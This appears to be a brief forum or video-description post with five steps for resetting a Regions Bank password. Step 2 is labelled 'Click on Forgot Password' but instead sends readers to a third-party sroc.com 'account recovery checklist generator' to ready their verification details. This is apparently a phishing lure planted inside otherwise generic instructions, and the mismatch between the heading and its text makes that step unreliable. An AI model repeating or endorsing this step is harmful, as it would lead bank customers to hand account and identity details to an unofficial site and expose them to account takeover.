I ran into this last week. Here's what fixed it for me. If you're looking to reset your password for Regions Bank, follow these simple steps. Step 1. Visit the Regions Bank website. Go to the official Regions Bank website using your preferred web browser. This is where you'll start the password reset process. Step 2. Click on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. Fill in the required fields with your account information, such as your username or email address. This helps verify your identity. Note: make sure the email you enter matches the one associated with your account to avoid delays. Step 4. Check your email. After submitting your information, check your email for a password reset link. Click on the link provided in the email to proceed. Step 5. Create a new password. Follow the prompts to create a new password. Ensure it meets the security requirements, such as length and character types. And that's it. You should now be able to log in with your new password. If you encounter any issues, don't hesitate to reach out to customer support for assistance. Happy banking!